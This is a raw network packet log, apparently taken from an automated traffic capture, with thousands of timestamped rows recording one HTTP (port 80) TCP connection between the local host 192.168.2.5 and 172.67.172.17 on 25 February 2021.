Feb 25, 2021 11:04:07.570453882 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.570472956 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.570497036 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.571182013 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.571208954 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.571223021 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.571243048 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.571268082 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.571285009 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.571947098 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.571969986 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.571986914 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.572002888 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.572057962 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.572758913 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.572787046 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.572803974 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.572820902 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.572838068 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.572845936 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.572869062 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.573693037 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.573715925 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.573731899 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.573745966 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.573755980 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.573757887 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.573811054 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.573846102 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.574677944 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.574701071 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.574717045 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.574733019 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.574744940 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.574750900 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.574779034 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.575634003 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.575705051 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.575807095 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.575843096 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.575861931 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.575891018 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.575891018 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.575927019 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.575956106 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.576765060 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.576788902 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.576806068 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.576821089 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.576832056 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.576837063 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.576864958 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.576904058 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.577713966 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.577739000 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.577750921 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.577769041 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.577785015 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.577822924 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.578701973 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.578726053 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.578742027 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.578761101 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.578768969 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.578778028 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.578794956 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.578845978 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.579601049 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.579629898 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.579646111 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.579662085 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.579678059 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.579694986 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.579720974 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.580529928 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.580554962 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.580569983 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.580585957 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.580593109 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.580601931 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.580638885 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.580670118 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.581456900 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.581485987 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.581502914 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.581518888 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.581535101 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.581562996 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.582403898 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.582434893 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.582448006 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.582464933 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.582482100 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.582499981 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.582530022 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.583288908 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.583317041 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.583333015 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.583349943 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.583365917 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.583403111 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.584208012 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.584238052 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.584254980 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.584268093 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.584280014 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.584287882 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.584496975 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.585072994 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.585095882 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.585108042 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.585119963 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.585136890 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.585187912 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.585913897 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.585938931 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.585954905 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.585971117 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.585993052 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.585994959 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.586030960 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.586822987 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.586844921 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.586862087 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.586925030 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.587301970 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.587325096 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.587343931 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.587362051 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.587367058 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.587383986 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.587393045 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.587430000 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.588213921 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.588239908 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.588252068 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.588268995 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.588284969 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.588335037 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.589150906 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.589174986 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.589195013 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.589212894 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.589212894 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.589227915 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.589265108 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.589293957 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.589958906 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.589987993 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.590007067 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.590046883 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.590065002 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.590151072 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.590872049 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.590897083 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.590923071 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.590941906 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.590941906 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.590958118 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.590980053 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.591008902 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.591590881 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.591618061 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.591634989 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.591650009 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.591665983 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.591772079 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.592422009 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.592447042 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.592464924 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.592483044 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.592499971 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.592500925 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.592526913 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.592562914 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.593255997 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.593286037 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.593303919 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.593319893 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.593332052 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.593348980 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.593374014 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.594084024 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.594114065 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.594131947 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.594146013 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.594149113 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.594170094 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.594181061 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.594218969 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.594877005 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.594901085 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.594922066 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.594938040 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.594954014 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.594969034 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.595000029 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.595690966 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.595715046 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.595736027 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.595752954 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.595767975 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.595783949 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.595850945 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.596668959 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.596692085 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.596710920 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.596729040 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.596729994 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.596745014 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.596761942 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.596765041 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.596782923 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.597722054 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.597753048 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.597776890 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.597794056 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.597798109 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.597815037 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.597826958 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.597831011 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.597851992 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.597863913 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.597922087 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.598754883 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.598782063 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.598797083 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.598813057 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.598829031 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.598848104 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.599431038 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.599670887 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.599694014 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.599721909 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.599737883 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.599751949 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.599765062 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.599771976 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.599785089 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.599826097 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.600557089 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.600584984 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.600600958 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.600616932 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.600634098 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.600635052 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.600651979 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.600652933 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.600697994 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.601471901 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.601495028 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.601552963 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.669373035 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.731456995 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.749636889 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.749672890 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.749686956 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.749702930 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.749716043 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.749727964 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.749741077 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.749757051 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.749767065 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.749773979 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.749788046 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.749790907 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.749803066 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.749806881 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.749836922 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.759644985 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.759680986 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.759696960 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.759712934 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.759716034 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.759733915 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.759735107 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.759747028 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.759767056 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.759783030 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.759803057 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.759819984 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.759824991 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.759835958 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.759851933 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.759866953 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.759871006 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.759882927 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.759896994 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.759931087 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.760077000 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760094881 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760119915 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.760121107 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760138988 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760153055 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760159016 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.760174990 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760190964 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760198116 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.760248899 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.760529041 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760550976 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760571003 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760587931 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760602951 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760608912 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.760618925 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760637999 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.760644913 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760649920 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760665894 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760667086 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.760682106 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760696888 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760711908 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760714054 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.760726929 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760741949 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.760756969 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.760778904 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.761464119 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.761488914 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.761504889 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.761521101 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.761538029 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.761538029 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.761554956 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.761571884 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.761590958 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.761607885 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.761615992 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.761624098 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.761636019 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.761647940 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.761663914 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.761678934 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.761686087 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.761702061 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.761729956 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.762438059 CET	80	49716	172.67.172.17	192.168.2.5
